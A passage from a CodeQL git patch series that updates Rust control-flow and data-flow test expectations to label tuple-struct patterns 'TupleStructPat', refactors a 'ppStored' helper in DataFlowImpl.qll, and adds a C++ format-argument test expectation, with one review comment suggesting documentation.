@@ -7,9 +7,9 @@ edges | main.rs:31:27:31:27 | s | main.rs:31:14:31:28 | ...::A(...) [A] | provenance | | | main.rs:32:22:32:23 | e1 [A] | main.rs:32:10:32:24 | get_var_pos(...) | provenance | | | main.rs:43:13:43:21 | source(...) | main.rs:44:26:44:26 | s | provenance | | -| main.rs:44:14:44:27 | set_var_pos(...) [B] | main.rs:47:9:47:23 | ...::B(...) [B] | provenance | | +| main.rs:44:14:44:27 | set_var_pos(...) [B] | main.rs:47:9:47:23 | TupleStructPat [B] | provenance | | | main.rs:44:26:44:26 | s | main.rs:44:14:44:27 | set_var_pos(...) [B] | provenance | | -| main.rs:47:9:47:23 | ...::B(...) [B] | main.rs:47:22:47:22 | i | provenance | | +| main.rs:47:9:47:23 | TupleStructPat [B] | main.rs:47:22:47:22 | i | provenance | | | main.rs:47:22:47:22 | i | main.rs:47:33:47:33 | i | provenance | | | main.rs:62:13:62:21 | source(...) | main.rs:63:40:63:40 | s | provenance | | | main.rs:63:14:63:42 | ...::C {...} [C] | main.rs:64:24:64:25 | e1 [C] | provenance | | @@ -32,7 +32,7 @@ nodes | main.rs:43:13:43:21 | source(...) | semmle.label | source(...) | | main.rs:44:14:44:27 | set_var_pos(...) [B] | semmle.label | set_var_pos(...) [B] | | main.rs:44:26:44:26 | s | semmle.label | s | -| main.rs:47:9:47:23 | ...::B(...) [B] | semmle.label | ...::B(...) [B] | +| main.rs:47:9:47:23 | TupleStructPat [B] | semmle.label | TupleStructPat [B] | | main.rs:47:22:47:22 | i | semmle.label | i | | main.rs:47:33:47:33 | i | semmle.label | i | | main.rs:62:13:62:21 | source(...) | semmle.label | source(...) | diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index b55c0e9d04c..6b979eac0da 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected +++ b/rust/ql/test/library-tests/variables/Cfg.expected 
@@ -197,10 +197,10 @@ edges | variables.rs:85:32:85:39 | "Hello!" | variables.rs:85:19:85:40 | ...::from(...) | | | variables.rs:87:5:90:5 | if ... {...} | variables.rs:84:19:91:1 | { ... } | | | variables.rs:87:8:88:12 | let ... = s1 | variables.rs:88:11:88:12 | s1 | | -| variables.rs:87:12:87:23 | Some(...) | variables.rs:87:5:90:5 | if ... {...} | no-match | -| variables.rs:87:12:87:23 | Some(...) | variables.rs:87:17:87:22 | s2 | match | +| variables.rs:87:12:87:23 | TupleStructPat | variables.rs:87:5:90:5 | if ... {...} | no-match | +| variables.rs:87:12:87:23 | TupleStructPat | variables.rs:87:17:87:22 | s2 | match | | variables.rs:87:17:87:22 | s2 | variables.rs:89:9:89:22 | ExprStmt | match | -| variables.rs:88:11:88:12 | s1 | variables.rs:87:12:87:23 | Some(...) | | +| variables.rs:88:11:88:12 | s1 | variables.rs:87:12:87:23 | TupleStructPat | | | variables.rs:88:14:90:5 | { ... } | variables.rs:87:5:90:5 | if ... {...} | | | variables.rs:89:9:89:17 | print_str | variables.rs:89:19:89:20 | s2 | | | variables.rs:89:9:89:21 | print_str(...) | variables.rs:88:14:90:5 | { ... } | | 
@@ -210,11 +210,11 @@ edges | variables.rs:93:1:99:1 | exit fn let_pattern4 (normal) | variables.rs:93:1:99:1 | exit fn let_pattern4 | | | variables.rs:93:19:99:1 | { ... } | variables.rs:93:1:99:1 | exit fn let_pattern4 (normal) | | | variables.rs:94:5:97:10 | let ... = ... else {...} | variables.rs:94:34:94:37 | Some | | -| variables.rs:94:9:94:16 | Some(...) | variables.rs:94:14:94:15 | x5 | match | -| variables.rs:94:9:94:16 | Some(...) | variables.rs:96:13:96:19 | MacroStmts | no-match | +| variables.rs:94:9:94:16 | TupleStructPat | variables.rs:94:14:94:15 | x5 | match | +| variables.rs:94:9:94:16 | TupleStructPat | variables.rs:96:13:96:19 | MacroStmts | no-match | | variables.rs:94:14:94:15 | x5 | variables.rs:98:5:98:18 | ExprStmt | match | | variables.rs:94:34:94:37 | Some | variables.rs:94:39:94:42 | "x5" | | -| variables.rs:94:34:94:43 | Some(...) | variables.rs:94:9:94:16 | Some(...) | | +| variables.rs:94:34:94:43 | Some(...) | variables.rs:94:9:94:16 | TupleStructPat | | | variables.rs:94:39:94:42 | "x5" | variables.rs:94:34:94:43 | Some(...) | | | variables.rs:96:13:96:19 | "not yet implemented" | variables.rs:96:13:96:19 | ...::panic(...) | | | variables.rs:96:13:96:19 | ...::panic | variables.rs:96:13:96:19 | "not yet implemented" | | 
@@ -237,10 +237,10 @@ edges | variables.rs:102:32:102:39 | "Hello!" | variables.rs:102:19:102:40 | ...::from(...) | | | variables.rs:104:5:107:5 | while ... { ... } | variables.rs:101:19:108:1 | { ... } | | | variables.rs:104:11:105:12 | let ... = s1 | variables.rs:105:11:105:12 | s1 | | -| variables.rs:104:15:104:26 | Some(...) | variables.rs:104:5:107:5 | while ... { ... } | no-match | -| variables.rs:104:15:104:26 | Some(...) | variables.rs:104:20:104:25 | s2 | match | +| variables.rs:104:15:104:26 | TupleStructPat | variables.rs:104:5:107:5 | while ... { ... } | no-match | +| variables.rs:104:15:104:26 | TupleStructPat | variables.rs:104:20:104:25 | s2 | match | | variables.rs:104:20:104:25 | s2 | variables.rs:106:9:106:22 | ExprStmt | match | -| variables.rs:105:11:105:12 | s1 | variables.rs:104:15:104:26 | Some(...) | | +| variables.rs:105:11:105:12 | s1 | variables.rs:104:15:104:26 | TupleStructPat | | | variables.rs:105:14:107:5 | { ... } | variables.rs:104:11:105:12 | let ... = s1 | | | variables.rs:106:9:106:17 | print_str | variables.rs:106:19:106:20 | s2 | | | variables.rs:106:9:106:21 | print_str(...) | variables.rs:105:14:107:5 | { ... } | | 
@@ -259,17 +259,17 @@ edges | variables.rs:112:14:112:15 | 10 | variables.rs:112:9:112:10 | y1 | | | variables.rs:114:5:122:5 | ExprStmt | variables.rs:114:11:114:12 | x6 | | | variables.rs:114:5:122:5 | match x6 { ... } | variables.rs:124:5:124:18 | ExprStmt | | -| variables.rs:114:11:114:12 | x6 | variables.rs:115:9:115:16 | Some(...) | | -| variables.rs:115:9:115:16 | Some(...) | variables.rs:115:14:115:15 | 50 | match | -| variables.rs:115:9:115:16 | Some(...) | variables.rs:116:9:116:16 | Some(...) | no-match | +| variables.rs:114:11:114:12 | x6 | variables.rs:115:9:115:16 | TupleStructPat | | +| variables.rs:115:9:115:16 | TupleStructPat | variables.rs:115:14:115:15 | 50 | match | +| variables.rs:115:9:115:16 | TupleStructPat | variables.rs:116:9:116:16 | TupleStructPat | no-match | | variables.rs:115:14:115:15 | 50 | variables.rs:115:14:115:15 | 50 | | | variables.rs:115:14:115:15 | 50 | variables.rs:115:21:115:29 | print_str | match | -| variables.rs:115:14:115:15 | 50 | variables.rs:116:9:116:16 | Some(...) | no-match | +| variables.rs:115:14:115:15 | 50 | variables.rs:116:9:116:16 | TupleStructPat | no-match | | variables.rs:115:21:115:29 | print_str | variables.rs:115:31:115:38 | "Got 50" | | | variables.rs:115:21:115:39 | print_str(...) | variables.rs:114:5:122:5 | match x6 { ... } | | | variables.rs:115:31:115:38 | "Got 50" | variables.rs:115:21:115:39 | print_str(...) | | -| variables.rs:116:9:116:16 | Some(...) | variables.rs:116:14:116:15 | y1 | match | -| variables.rs:116:9:116:16 | Some(...) | variables.rs:121:9:121:12 | None | no-match | +| variables.rs:116:9:116:16 | TupleStructPat | variables.rs:116:14:116:15 | y1 | match | +| variables.rs:116:9:116:16 | TupleStructPat | variables.rs:121:9:121:12 | None | no-match | | variables.rs:116:14:116:15 | y1 | variables.rs:119:13:119:21 | print_i64 | match | | variables.rs:118:9:120:9 | { ... } | variables.rs:114:5:122:5 | match x6 { ... 
} | | | variables.rs:119:13:119:21 | print_i64 | variables.rs:119:23:119:24 | y1 | | @@ -404,12 +404,12 @@ edges | variables.rs:189:18:189:33 | ...::Left(...) | variables.rs:189:9:189:14 | either | | | variables.rs:189:31:189:32 | 32 | variables.rs:189:18:189:33 | ...::Left(...) | | | variables.rs:190:5:193:5 | match either { ... } | variables.rs:188:21:194:1 | { ... } | | -| variables.rs:190:11:190:16 | either | variables.rs:191:9:191:24 | ...::Left(...) | | -| variables.rs:191:9:191:24 | ...::Left(...) | variables.rs:191:22:191:23 | a3 | match | -| variables.rs:191:9:191:24 | ...::Left(...) | variables.rs:191:28:191:44 | ...::Right(...) | no-match | +| variables.rs:190:11:190:16 | either | variables.rs:191:9:191:24 | TupleStructPat | | +| variables.rs:191:9:191:24 | TupleStructPat | variables.rs:191:22:191:23 | a3 | match | +| variables.rs:191:9:191:24 | TupleStructPat | variables.rs:191:28:191:44 | TupleStructPat | no-match | | variables.rs:191:9:191:44 | [match(true)] ... \| ... | variables.rs:192:16:192:24 | print_i64 | match | | variables.rs:191:22:191:23 | a3 | variables.rs:191:9:191:44 | [match(true)] ... \| ... | match | -| variables.rs:191:28:191:44 | ...::Right(...) | variables.rs:191:42:191:43 | a3 | match | +| variables.rs:191:28:191:44 | TupleStructPat | variables.rs:191:42:191:43 | a3 | match | | variables.rs:191:42:191:43 | a3 | variables.rs:191:9:191:44 | [match(true)] ... \| ... | match | | variables.rs:192:16:192:24 | print_i64 | variables.rs:192:26:192:27 | a3 | | | variables.rs:192:16:192:28 | print_i64(...) | variables.rs:190:5:193:5 | match either { ... } | | 
@@ -424,47 +424,47 @@ edges | variables.rs:203:34:203:35 | 62 | variables.rs:203:14:203:36 | ...::Second(...) | | | variables.rs:204:5:207:5 | ExprStmt | variables.rs:204:11:204:12 | tv | | | variables.rs:204:5:207:5 | match tv { ... } | variables.rs:208:5:211:5 | ExprStmt | | -| variables.rs:204:11:204:12 | tv | variables.rs:205:9:205:30 | ...::First(...) | | -| variables.rs:205:9:205:30 | ...::First(...) | variables.rs:205:28:205:29 | a4 | match | -| variables.rs:205:9:205:30 | ...::First(...) | variables.rs:205:34:205:56 | ...::Second(...) | no-match | +| variables.rs:204:11:204:12 | tv | variables.rs:205:9:205:30 | TupleStructPat | | +| variables.rs:205:9:205:30 | TupleStructPat | variables.rs:205:28:205:29 | a4 | match | +| variables.rs:205:9:205:30 | TupleStructPat | variables.rs:205:34:205:56 | TupleStructPat | no-match | | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | variables.rs:206:16:206:24 | print_i64 | match | | variables.rs:205:28:205:29 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | -| variables.rs:205:34:205:56 | ...::Second(...) | variables.rs:205:54:205:55 | a4 | match | -| variables.rs:205:34:205:56 | ...::Second(...) | variables.rs:205:60:205:81 | ...::Third(...) | no-match | +| variables.rs:205:34:205:56 | TupleStructPat | variables.rs:205:54:205:55 | a4 | match | +| variables.rs:205:34:205:56 | TupleStructPat | variables.rs:205:60:205:81 | TupleStructPat | no-match | | variables.rs:205:54:205:55 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | -| variables.rs:205:60:205:81 | ...::Third(...) | variables.rs:205:79:205:80 | a4 | match | +| variables.rs:205:60:205:81 | TupleStructPat | variables.rs:205:79:205:80 | a4 | match | | variables.rs:205:79:205:80 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | | variables.rs:206:16:206:24 | print_i64 | variables.rs:206:26:206:27 | a4 | | | variables.rs:206:16:206:28 | print_i64(...) 
| variables.rs:204:5:207:5 | match tv { ... } | | | variables.rs:206:26:206:27 | a4 | variables.rs:206:16:206:28 | print_i64(...) | | | variables.rs:208:5:211:5 | ExprStmt | variables.rs:208:11:208:12 | tv | | | variables.rs:208:5:211:5 | match tv { ... } | variables.rs:212:11:212:12 | tv | | -| variables.rs:208:11:208:12 | tv | variables.rs:209:10:209:31 | ...::First(...) | | +| variables.rs:208:11:208:12 | tv | variables.rs:209:10:209:31 | TupleStructPat | | | variables.rs:209:9:209:83 | [match(true)] ... \| ... | variables.rs:210:16:210:24 | print_i64 | match | -| variables.rs:209:10:209:31 | ...::First(...) | variables.rs:209:29:209:30 | a5 | match | -| variables.rs:209:10:209:31 | ...::First(...) | variables.rs:209:35:209:57 | ...::Second(...) | no-match | -| variables.rs:209:10:209:57 | [match(false)] ... \| ... | variables.rs:209:62:209:83 | ...::Third(...) | no-match | +| variables.rs:209:10:209:31 | TupleStructPat | variables.rs:209:29:209:30 | a5 | match | +| variables.rs:209:10:209:31 | TupleStructPat | variables.rs:209:35:209:57 | TupleStructPat | no-match | +| variables.rs:209:10:209:57 | [match(false)] ... \| ... | variables.rs:209:62:209:83 | TupleStructPat | no-match | | variables.rs:209:10:209:57 | [match(true)] ... \| ... | variables.rs:209:9:209:83 | [match(true)] ... \| ... | match | | variables.rs:209:29:209:30 | a5 | variables.rs:209:10:209:57 | [match(true)] ... \| ... | match | -| variables.rs:209:35:209:57 | ...::Second(...) | variables.rs:209:10:209:57 | [match(false)] ... \| ... | no-match | -| variables.rs:209:35:209:57 | ...::Second(...) | variables.rs:209:55:209:56 | a5 | match | +| variables.rs:209:35:209:57 | TupleStructPat | variables.rs:209:10:209:57 | [match(false)] ... \| ... | no-match | +| variables.rs:209:35:209:57 | TupleStructPat | variables.rs:209:55:209:56 | a5 | match | | variables.rs:209:55:209:56 | a5 | variables.rs:209:10:209:57 | [match(true)] ... \| ... | match | -| variables.rs:209:62:209:83 | ...::Third(...) 
| variables.rs:209:81:209:82 | a5 | match | +| variables.rs:209:62:209:83 | TupleStructPat | variables.rs:209:81:209:82 | a5 | match | | variables.rs:209:81:209:82 | a5 | variables.rs:209:9:209:83 | [match(true)] ... \| ... | match | | variables.rs:210:16:210:24 | print_i64 | variables.rs:210:26:210:27 | a5 | | | variables.rs:210:16:210:28 | print_i64(...) | variables.rs:208:5:211:5 | match tv { ... } | | | variables.rs:210:26:210:27 | a5 | variables.rs:210:16:210:28 | print_i64(...) | | | variables.rs:212:5:215:5 | match tv { ... } | variables.rs:202:21:216:1 | { ... } | | -| variables.rs:212:11:212:12 | tv | variables.rs:213:9:213:30 | ...::First(...) | | -| variables.rs:213:9:213:30 | ...::First(...) | variables.rs:213:28:213:29 | a6 | match | -| variables.rs:213:9:213:30 | ...::First(...) | variables.rs:213:35:213:57 | ...::Second(...) | no-match | +| variables.rs:212:11:212:12 | tv | variables.rs:213:9:213:30 | TupleStructPat | | +| variables.rs:213:9:213:30 | TupleStructPat | variables.rs:213:28:213:29 | a6 | match | +| variables.rs:213:9:213:30 | TupleStructPat | variables.rs:213:35:213:57 | TupleStructPat | no-match | | variables.rs:213:9:213:83 | [match(true)] ... \| ... | variables.rs:214:16:214:24 | print_i64 | match | | variables.rs:213:28:213:29 | a6 | variables.rs:213:9:213:83 | [match(true)] ... \| ... | match | -| variables.rs:213:35:213:57 | ...::Second(...) | variables.rs:213:55:213:56 | a6 | match | -| variables.rs:213:35:213:57 | ...::Second(...) | variables.rs:213:61:213:82 | ...::Third(...) | no-match | +| variables.rs:213:35:213:57 | TupleStructPat | variables.rs:213:55:213:56 | a6 | match | +| variables.rs:213:35:213:57 | TupleStructPat | variables.rs:213:61:213:82 | TupleStructPat | no-match | | variables.rs:213:35:213:82 | [match(true)] ... \| ... | variables.rs:213:9:213:83 | [match(true)] ... \| ... | match | | variables.rs:213:55:213:56 | a6 | variables.rs:213:35:213:82 | [match(true)] ... \| ... 
| match | -| variables.rs:213:61:213:82 | ...::Third(...) | variables.rs:213:80:213:81 | a6 | match | +| variables.rs:213:61:213:82 | TupleStructPat | variables.rs:213:80:213:81 | a6 | match | | variables.rs:213:80:213:81 | a6 | variables.rs:213:35:213:82 | [match(true)] ... \| ... | match | | variables.rs:214:16:214:24 | print_i64 | variables.rs:214:26:214:27 | a6 | | | variables.rs:214:16:214:28 | print_i64(...) | variables.rs:212:5:215:5 | match tv { ... } | | 
@@ -478,14 +478,14 @@ edges | variables.rs:219:18:219:33 | ...::Left(...) | variables.rs:219:9:219:14 | either | | | variables.rs:219:31:219:32 | 32 | variables.rs:219:18:219:33 | ...::Left(...) | | | variables.rs:220:5:225:5 | match either { ... } | variables.rs:218:21:226:1 | { ... } | | -| variables.rs:220:11:220:16 | either | variables.rs:221:9:221:24 | ...::Left(...) | | -| variables.rs:221:9:221:24 | ...::Left(...) | variables.rs:221:22:221:23 | a7 | match | -| variables.rs:221:9:221:24 | ...::Left(...) | variables.rs:221:28:221:44 | ...::Right(...) | no-match | +| variables.rs:220:11:220:16 | either | variables.rs:221:9:221:24 | TupleStructPat | | +| variables.rs:221:9:221:24 | TupleStructPat | variables.rs:221:22:221:23 | a7 | match | +| variables.rs:221:9:221:24 | TupleStructPat | variables.rs:221:28:221:44 | TupleStructPat | no-match | | variables.rs:221:9:221:44 | [match(false)] ... \| ... | variables.rs:224:9:224:9 | _ | no-match | | variables.rs:221:9:221:44 | [match(true)] ... \| ... | variables.rs:222:16:222:17 | a7 | match | | variables.rs:221:22:221:23 | a7 | variables.rs:221:9:221:44 | [match(true)] ... \| ... | match | -| variables.rs:221:28:221:44 | ...::Right(...) | variables.rs:221:9:221:44 | [match(false)] ... \| ... | no-match | -| variables.rs:221:28:221:44 | ...::Right(...) | variables.rs:221:42:221:43 | a7 | match | +| variables.rs:221:28:221:44 | TupleStructPat | variables.rs:221:9:221:44 | [match(false)] ... \| ... | no-match | +| variables.rs:221:28:221:44 | TupleStructPat | variables.rs:221:42:221:43 | a7 | match | | variables.rs:221:42:221:43 | a7 | variables.rs:221:9:221:44 | [match(true)] ... \| ... | match | | variables.rs:222:16:222:17 | a7 | variables.rs:222:21:222:21 | 0 | | | variables.rs:222:16:222:21 | ... > ... | variables.rs:223:16:223:24 | print_i64 | true | 
@@ -505,15 +505,15 @@ edges | variables.rs:229:18:229:33 | ...::Left(...) | variables.rs:229:9:229:14 | either | | | variables.rs:229:31:229:32 | 32 | variables.rs:229:18:229:33 | ...::Left(...) | | | variables.rs:231:5:242:5 | match either { ... } | variables.rs:228:21:243:1 | { ... } | | -| variables.rs:231:11:231:16 | either | variables.rs:233:14:233:30 | ...::Left(...) | | +| variables.rs:231:11:231:16 | either | variables.rs:233:14:233:30 | TupleStructPat | | | variables.rs:232:9:233:52 | [match(true)] e | variables.rs:235:13:235:27 | ExprStmt | match | -| variables.rs:233:14:233:30 | ...::Left(...) | variables.rs:233:27:233:29 | a11 | match | -| variables.rs:233:14:233:30 | ...::Left(...) | variables.rs:233:34:233:51 | ...::Right(...) | no-match | +| variables.rs:233:14:233:30 | TupleStructPat | variables.rs:233:27:233:29 | a11 | match | +| variables.rs:233:14:233:30 | TupleStructPat | variables.rs:233:34:233:51 | TupleStructPat | no-match | | variables.rs:233:14:233:51 | [match(false)] ... \| ... | variables.rs:241:9:241:9 | _ | no-match | | variables.rs:233:14:233:51 | [match(true)] ... \| ... | variables.rs:232:9:233:52 | [match(true)] e | match | | variables.rs:233:27:233:29 | a11 | variables.rs:233:14:233:51 | [match(true)] ... \| ... | match | -| variables.rs:233:34:233:51 | ...::Right(...) | variables.rs:233:14:233:51 | [match(false)] ... \| ... | no-match | -| variables.rs:233:34:233:51 | ...::Right(...) | variables.rs:233:48:233:50 | a11 | match | +| variables.rs:233:34:233:51 | TupleStructPat | variables.rs:233:14:233:51 | [match(false)] ... \| ... | no-match | +| variables.rs:233:34:233:51 | TupleStructPat | variables.rs:233:48:233:50 | a11 | match | | variables.rs:233:48:233:50 | a11 | variables.rs:233:14:233:51 | [match(true)] ... \| ... | match | | variables.rs:234:12:240:9 | { ... } | variables.rs:231:5:242:5 | match either { ... } | | | variables.rs:235:13:235:21 | print_i64 | variables.rs:235:23:235:25 | a11 | | 
@@ -522,10 +522,10 @@ edges | variables.rs:235:23:235:25 | a11 | variables.rs:235:13:235:26 | print_i64(...) | | | variables.rs:236:13:239:13 | if ... {...} | variables.rs:234:12:240:9 | { ... } | | | variables.rs:236:16:237:15 | let ... = e | variables.rs:237:15:237:15 | e | | -| variables.rs:236:20:236:36 | ...::Left(...) | variables.rs:236:13:239:13 | if ... {...} | no-match | -| variables.rs:236:20:236:36 | ...::Left(...) | variables.rs:236:33:236:35 | a12 | match | +| variables.rs:236:20:236:36 | TupleStructPat | variables.rs:236:13:239:13 | if ... {...} | no-match | +| variables.rs:236:20:236:36 | TupleStructPat | variables.rs:236:33:236:35 | a12 | match | | variables.rs:236:33:236:35 | a12 | variables.rs:238:17:238:32 | ExprStmt | match | -| variables.rs:237:15:237:15 | e | variables.rs:236:20:236:36 | ...::Left(...) | | +| variables.rs:237:15:237:15 | e | variables.rs:236:20:236:36 | TupleStructPat | | | variables.rs:237:17:239:13 | { ... } | variables.rs:236:13:239:13 | if ... {...} | | | variables.rs:238:17:238:25 | print_i64 | variables.rs:238:28:238:30 | a12 | | | variables.rs:238:17:238:31 | print_i64(...) | variables.rs:237:17:239:13 | { ... } | | 
@@ -543,20 +543,20 @@ edges | variables.rs:253:14:253:35 | ...::Second(...) | variables.rs:253:9:253:10 | fv | | | variables.rs:253:33:253:34 | 62 | variables.rs:253:14:253:35 | ...::Second(...) | | | variables.rs:254:5:257:5 | match fv { ... } | variables.rs:252:21:258:1 | { ... } | | -| variables.rs:254:11:254:12 | fv | variables.rs:255:9:255:30 | ...::First(...) | | -| variables.rs:255:9:255:30 | ...::First(...) | variables.rs:255:27:255:29 | a13 | match | -| variables.rs:255:9:255:30 | ...::First(...) | variables.rs:255:35:255:57 | ...::Second(...) | no-match | +| variables.rs:254:11:254:12 | fv | variables.rs:255:9:255:30 | TupleStructPat | | +| variables.rs:255:9:255:30 | TupleStructPat | variables.rs:255:27:255:29 | a13 | match | +| variables.rs:255:9:255:30 | TupleStructPat | variables.rs:255:35:255:57 | TupleStructPat | no-match | | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | variables.rs:256:16:256:24 | print_i64 | match | | variables.rs:255:27:255:29 | a13 | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | -| variables.rs:255:35:255:57 | ...::Second(...) | variables.rs:255:54:255:56 | a13 | match | -| variables.rs:255:35:255:57 | ...::Second(...) | variables.rs:255:61:255:82 | ...::Third(...) | no-match | -| variables.rs:255:35:255:82 | [match(false)] ... \| ... | variables.rs:255:87:255:109 | ...::Fourth(...) | no-match | +| variables.rs:255:35:255:57 | TupleStructPat | variables.rs:255:54:255:56 | a13 | match | +| variables.rs:255:35:255:57 | TupleStructPat | variables.rs:255:61:255:82 | TupleStructPat | no-match | +| variables.rs:255:35:255:82 | [match(false)] ... \| ... | variables.rs:255:87:255:109 | TupleStructPat | no-match | | variables.rs:255:35:255:82 | [match(true)] ... \| ... | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | | variables.rs:255:54:255:56 | a13 | variables.rs:255:35:255:82 | [match(true)] ... \| ... | match | -| variables.rs:255:61:255:82 | ...::Third(...) 
| variables.rs:255:35:255:82 | [match(false)] ... \| ... | no-match | -| variables.rs:255:61:255:82 | ...::Third(...) | variables.rs:255:79:255:81 | a13 | match | +| variables.rs:255:61:255:82 | TupleStructPat | variables.rs:255:35:255:82 | [match(false)] ... \| ... | no-match | +| variables.rs:255:61:255:82 | TupleStructPat | variables.rs:255:79:255:81 | a13 | match | | variables.rs:255:79:255:81 | a13 | variables.rs:255:35:255:82 | [match(true)] ... \| ... | match | -| variables.rs:255:87:255:109 | ...::Fourth(...) | variables.rs:255:106:255:108 | a13 | match | +| variables.rs:255:87:255:109 | TupleStructPat | variables.rs:255:106:255:108 | a13 | match | | variables.rs:255:106:255:108 | a13 | variables.rs:255:9:255:109 | [match(true)] ... \| ... \| ... | match | | variables.rs:256:16:256:24 | print_i64 | variables.rs:256:26:256:28 | a13 | | | variables.rs:256:16:256:29 | print_i64(...) | variables.rs:254:5:257:5 | match fv { ... } | | 
@@ -582,14 +582,14 @@ edges | variables.rs:268:5:268:17 | print_str(...) | variables.rs:265:28:269:1 | { ... } | | | variables.rs:268:5:268:18 | ExprStmt | variables.rs:268:5:268:13 | print_str | | | variables.rs:268:15:268:16 | c1 | variables.rs:268:5:268:17 | print_str(...) | | -| variables.rs:271:1:275:1 | enter fn param_pattern2 | variables.rs:272:6:272:21 | ...::Left(...) | | +| variables.rs:271:1:275:1 | enter fn param_pattern2 | variables.rs:272:6:272:21 | TupleStructPat | | | variables.rs:271:1:275:1 | exit fn param_pattern2 (normal) | variables.rs:271:1:275:1 | exit fn param_pattern2 | | | variables.rs:272:5:272:50 | ...: Either | variables.rs:274:5:274:18 | ExprStmt | | -| variables.rs:272:6:272:21 | ...::Left(...) | variables.rs:272:19:272:20 | a9 | match | -| variables.rs:272:6:272:21 | ...::Left(...) | variables.rs:272:25:272:41 | ...::Right(...) | no-match | +| variables.rs:272:6:272:21 | TupleStructPat | variables.rs:272:19:272:20 | a9 | match | +| variables.rs:272:6:272:21 | TupleStructPat | variables.rs:272:25:272:41 | TupleStructPat | no-match | | variables.rs:272:6:272:41 | [match(true)] ... \| ... | variables.rs:272:5:272:50 | ...: Either | match | | variables.rs:272:19:272:20 | a9 | variables.rs:272:6:272:41 | [match(true)] ... \| ... | match | -| variables.rs:272:25:272:41 | ...::Right(...) | variables.rs:272:39:272:40 | a9 | match | +| variables.rs:272:25:272:41 | TupleStructPat | variables.rs:272:39:272:40 | a9 | match | | variables.rs:272:39:272:40 | a9 | variables.rs:272:6:272:41 | [match(true)] ... \| ... | match | | variables.rs:273:9:275:1 | { ... } | variables.rs:271:1:275:1 | exit fn param_pattern2 (normal) | | | variables.rs:274:5:274:13 | print_i64 | variables.rs:274:15:274:16 | a9 | | From c187a7ad340a23584dc5d973de7d59bb044e30d9 Mon Sep 17 00:00:00 2001 
From: Anders Schack-Mulligen Date: Wed, 4 Dec 2024 11:04:49 +0100 Subject: [PATCH 0788/1267] Dataflow: Address review comments. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 24 +++++++------------ 1 file changed, 9 insertions(+), 15 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 6c91017ee8a..313934378c6 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1423,6 +1423,12 @@ module MakeImpl Lang> { private class TypOption = TypOption::Option; + private string ppStored(TypOption stored) { + exists(string ppt | ppt = stored.toString() | + if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt + ) + } + /* Begin: Stage logic. */ pragma[nomagic] private Typ getNodeTyp(NodeEx node) { @@ -1604,14 +1610,8 @@ module MakeImpl Lang> { private string ppTyp() { result = t.toString() and result != "" } - private string ppStored() { - exists(string ppt | ppt = stored.toString() | - if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt - ) - } - override string toString() { - result = p + concat(" : " + this.ppTyp()) + " " + ap + this.ppStored() + result = p + concat(" : " + this.ppTyp()) + " " + ap + ppStored(stored) } override Location getLocation() { result = p.getLocation() } @@ -3050,12 +3050,6 @@ module MakeImpl Lang> { ) } - private string ppStored() { - exists(string ppt | ppt = stored.toString() | - if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt - ) - } - private string ppCtx() { result = " <" + cc + ">" } private string ppSummaryCtx() { @@ -3066,7 +3060,7 @@ module MakeImpl Lang> { } override string toString() { - result = node.toString() + this.ppType() + this.ppAp() + this.ppStored() + result = node.toString() + this.ppType() + this.ppAp() + ppStored(stored) } /** 
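Review bot: The new module-level `ppStored(TypOption stored)` in the first hunk has no QLDoc, and it is now shared by two `toString` overrides and by `toStringWithContext`, so its output contract is worth stating once. I would add above it `/** Gets the print suffix for stored: "" if it is none or prints as "", else " : " + its toString(). */`. The enclosing module and both classes start and end outside these hunks, so any naming convention for sibling `pp*` helpers could not be checked here.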
@@ -3075,7 +3069,7 @@ module MakeImpl Lang> { */ string toStringWithContext() { result = - node.toString() + this.ppType() + this.ppAp() + this.ppStored() + this.ppCtx() + + node.toString() + this.ppType() + this.ppAp() + ppStored(stored) + this.ppCtx() + this.ppSummaryCtx() } From 19424020c372f284e7595e3ffbf93341533acf38 Mon Sep 17 00:00:00 2001 From: Calum Grant Date: Wed, 4 Dec 2024 10:57:15 +0000 Subject: [PATCH 0789/1267] C++: Test for erroneous string types --- .../Buildless/WrongTypeFormatArguments.expected | 1 + .../Format/WrongTypeFormatArguments/Buildless/tests.c | 3 ++- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected index 745f2f790f7..8ff4f02d4d6 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/WrongTypeFormatArguments.expected @@ -1 +1,2 @@ | tests.c:7:18:7:18 | 1 | This format specifier for type 'char *' does not match the argument type 'int'. | +| tests.c:11:18:11:20 | str | This format specifier for type 'char *' does not match the argument type ' *'. | diff --git a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c index 81698c497c5..175d2f23182 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c +++ b/cpp/ql/test/query-tests/Likely Bugs/Format/WrongTypeFormatArguments/Buildless/tests.c 
